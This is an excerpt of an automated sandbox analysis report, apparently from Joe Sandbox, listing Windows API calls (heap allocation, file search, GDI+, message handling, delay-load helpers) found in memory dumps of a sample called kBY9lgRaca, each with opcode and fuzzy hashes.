                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00CD3C3F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID:
                                                                  • API String ID: 190572456-0
                                                                  • Opcode ID: 83df33facd6dda07903ba4fd103eafe365e5c4bf92c24b7179874cfb85b46e95
                                                                  • Instruction ID: 17b39f0fc5c9e97e13ee9021284b81fbe9a6f4a06b1ec788fb8920f68226b2c4
                                                                  • Opcode Fuzzy Hash: 83df33facd6dda07903ba4fd103eafe365e5c4bf92c24b7179874cfb85b46e95
                                                                  • Instruction Fuzzy Hash: 80F0EC332103969FCF115E69EC04A9A7799EF85B607104626FB15E7390DB31EB20D7A1
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00CD4286,?,0000015D,?,?,?,?,00CD5762,000000FF,00000000,?,?), ref: 00CD8E38
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 216c0d9be398141a6111ff8b153f55ca7add94ebd31071313eae6f84e5c23af4
                                                                  • Instruction ID: 83d3749689398f646ea3074a903b1a91b83b8bf37e0b2ebded1dd6864c2627b1
                                                                  • Opcode Fuzzy Hash: 216c0d9be398141a6111ff8b153f55ca7add94ebd31071313eae6f84e5c23af4
                                                                  • Instruction Fuzzy Hash: E0E0E53920221596D67126269C04F9F7748DB413B0F110217AF2897BC1CF20CE0599E0
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CB5AC2
                                                                    • Part of subcall function 00CBB505: __EH_prolog.LIBCMT ref: 00CBB50A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: bebdd01e1478d9c3ade9595bdee8e7c03f763286b73bb426192673bdd8293796
                                                                  • Instruction ID: bce5b5a38cffce4350072ea7e3e596b0df435b5c4970be0bd065afd59545edd1
                                                                  • Opcode Fuzzy Hash: bebdd01e1478d9c3ade9595bdee8e7c03f763286b73bb426192673bdd8293796
                                                                  • Instruction Fuzzy Hash: DF013C30911694DAD725EBB8C055BEDFBA49F64304F64848DE85653282CBB41B08E7A2
                                                                  APIs
                                                                    • Part of subcall function 00CBA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA6C4
                                                                    • Part of subcall function 00CBA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA6F2
                                                                    • Part of subcall function 00CBA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA6FE
                                                                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CBA598
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1464966427-0
                                                                  • Opcode ID: 3b37f9c94a6c3b8a3b575a949ad866e9b938522d07dde383a0ef3ca35ff73628
                                                                  • Instruction ID: 428357c1698e91d5c893efe3873efeb64c7bf551fcdac9b06c2ed7aaf530a50b
                                                                  • Opcode Fuzzy Hash: 3b37f9c94a6c3b8a3b575a949ad866e9b938522d07dde383a0ef3ca35ff73628
                                                                  • Instruction Fuzzy Hash: 06F08231008790AACB3257B48904BCB7B906F1A331F048A4AF1FD52196C2755198AB23
                                                                  APIs
                                                                  • SetThreadExecutionState.KERNEL32(00000001), ref: 00CC0E3D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ExecutionStateThread
                                                                  • String ID:
                                                                  • API String ID: 2211380416-0
                                                                  • Opcode ID: 383ec6bccae640e989107727725707f9d7eb1893de6df45f6fbf26292700e56a
                                                                  • Instruction ID: 37e944fc314ff605fab29f43e648851c1d5d780ac17d1cfff036f017039fe714
                                                                  • Opcode Fuzzy Hash: 383ec6bccae640e989107727725707f9d7eb1893de6df45f6fbf26292700e56a
                                                                  • Instruction Fuzzy Hash: CAD02B1060109497DF113729E869FFF29068FC7310F0D002EF9855B283CE580C82B262
                                                                  APIs
                                                                  • GdipAlloc.GDIPLUS(00000010), ref: 00CCA62C
                                                                    • Part of subcall function 00CCA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CCA3DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Gdip$AllocBitmapCreateFromStream
                                                                  • String ID:
                                                                  • API String ID: 1915507550-0
                                                                  • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                  • Instruction ID: 25e31739267cab5ce5c55da19d9299c4df7920c4f04eb95344ed99a12d7d112a
                                                                  • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                  • Instruction Fuzzy Hash: 2CD0C77121020D7ADF41AB61DC16F7E7595EB01344F048129F842D5151EAB1DD10A556
                                                                  APIs
                                                                  • DloadProtectSection.DELAYIMP ref: 00CCE5E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: DloadProtectSection
                                                                  • String ID:
                                                                  • API String ID: 2203082970-0
                                                                  • Opcode ID: 1089722c96246ef3d143fd0cc75b989ba33e2c28c375646cafcd63217f063866
                                                                  • Instruction ID: c9eddef9ad92193efe711680a8dcf6ec861afb09de4a2ebc62a35a6bb9e57673
                                                                  • Opcode Fuzzy Hash: 1089722c96246ef3d143fd0cc75b989ba33e2c28c375646cafcd63217f063866
                                                                  • Instruction Fuzzy Hash: 3AD022B80C0380AFC701EBA8E882F893B5AB322704F80000CF304D2290CF7880C1D721
                                                                  APIs
                                                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00CC1B3E), ref: 00CCDD92
                                                                    • Part of subcall function 00CCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CCB579
                                                                    • Part of subcall function 00CCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CCB58A
                                                                    • Part of subcall function 00CCB568: IsDialogMessageW.USER32(00010410,?), ref: 00CCB59E
                                                                    • Part of subcall function 00CCB568: TranslateMessage.USER32(?), ref: 00CCB5AC
                                                                    • Part of subcall function 00CCB568: DispatchMessageW.USER32(?), ref: 00CCB5B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                  • String ID:
                                                                  • API String ID: 897784432-0
                                                                  • Opcode ID: 1f16da30b220c33082879c83ed8f9e504ca2db5fd4e7806e28db3b9bae64f62e
                                                                  • Instruction ID: cc8c093bf811328f5cff627726bfb15ba2d3d0be1f0e42137d9ff38438bcb56b
                                                                  • Opcode Fuzzy Hash: 1f16da30b220c33082879c83ed8f9e504ca2db5fd4e7806e28db3b9bae64f62e
                                                                  • Instruction Fuzzy Hash: 61D09E71144300BAD6012B51CD06F1E7AA2AB88B05F004558B284740F1CA72DD71EB12
                                                                  APIs
                                                                  • GetFileType.KERNELBASE(000000FF,00CB97BE), ref: 00CB98C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID:
                                                                  • API String ID: 3081899298-0
                                                                  • Opcode ID: 61449de7d984a29ce40f8eb4b52acec077a79f165c835af9c32d785c793aa695
                                                                  • Instruction ID: 2d1d91512d03ab08bdd5939f47dc5f17fcacc9078f011e366190eb1edc0e4ae8
                                                                  • Opcode Fuzzy Hash: 61449de7d984a29ce40f8eb4b52acec077a79f165c835af9c32d785c793aa695
                                                                  • Instruction Fuzzy Hash: 33C00234404245968E619B28A8891D97722EE533A6FB496A8D2798E0E1C333CE97EA11
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 3ab24b4e3a418dccda63f56cb04ad188c8d623ca4e22a84166e635cca5609fff
                                                                  • Instruction ID: d847ff5b4f372056232c74099920c8eed22f1ff78f224227fef6e95967a03ab6
                                                                  • Opcode Fuzzy Hash: 3ab24b4e3a418dccda63f56cb04ad188c8d623ca4e22a84166e635cca5609fff
                                                                  • Instruction Fuzzy Hash: 8AB012D525E240BC3504114BAC42D3B010CC1C3B10330843EFC01C04C1DC80BE912831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 9c6fd8dcad6dd20fe5c943af5626af29d96231fc6afa2bf3f94d635291c1b2a2
                                                                  • Instruction ID: 178283cc5932df35b44495e7e6dfc86d70238636bdeeba1e82539f7caaf183a7
                                                                  • Opcode Fuzzy Hash: 9c6fd8dcad6dd20fe5c943af5626af29d96231fc6afa2bf3f94d635291c1b2a2
                                                                  • Instruction Fuzzy Hash: D8B012D525E240BC3104514FAC42E3B011CC1C2B10330403EF805C01C1DC807E912931
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 5f84316fa8e7bc95541925e1dc9256f34f78ada828bc88c5c8fdc76e136c51b7
                                                                  • Instruction ID: d750b25621af44e8c2d3469c8fa9bf1f0444fbd39f9f8ab13a99e46b8ad95982
                                                                  • Opcode Fuzzy Hash: 5f84316fa8e7bc95541925e1dc9256f34f78ada828bc88c5c8fdc76e136c51b7
                                                                  • Instruction Fuzzy Hash: 07B012D125E240BC3504520BAC02E3B010CC2C3B10330C13EFC09C02C1DC40BE852831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCEAF9
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: c479ffdec7a4601ed44995e8238de88da2e974598cde170da9abef67ebe0d5dd
                                                                  • Instruction ID: 208345a2186b747f4d33c3136b89ed2747853d08aaeb7211802d22e1649711b0
                                                                  • Opcode Fuzzy Hash: c479ffdec7a4601ed44995e8238de88da2e974598cde170da9abef67ebe0d5dd
                                                                  • Instruction Fuzzy Hash: 75B012CB29B0827C31086206AD42D37010CC0C2B90330803EF400D40C1DC800C422431
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: f9f4da393591b47e89d838a2bc9884c0286210f323a026b2f965c7c5b17cff90
                                                                  • Instruction ID: 3ed86f3adea4ff8d10b7235398cdabad255e6d56bbbc0f99b279f8b5b8974963
                                                                  • Opcode Fuzzy Hash: f9f4da393591b47e89d838a2bc9884c0286210f323a026b2f965c7c5b17cff90
                                                                  • Instruction Fuzzy Hash: A8B012E129E140BC3104510BAD02E3B019CC1C2B10330403EF805C01C1DC407F822831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 40b308ee605ec3116551393c4160c2fa974ea4bc373060ad8df96f1664b28655
                                                                  • Instruction ID: 7ed7a9564c215a3f47af2e0538d7e90ba32586eebfe110d041deacdd665f3543
                                                                  • Opcode Fuzzy Hash: 40b308ee605ec3116551393c4160c2fa974ea4bc373060ad8df96f1664b28655
                                                                  • Instruction Fuzzy Hash: 84B012D135E140BC3104511BEC03E7B010CC1C2B10330443EF805C01C1DC407E812831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
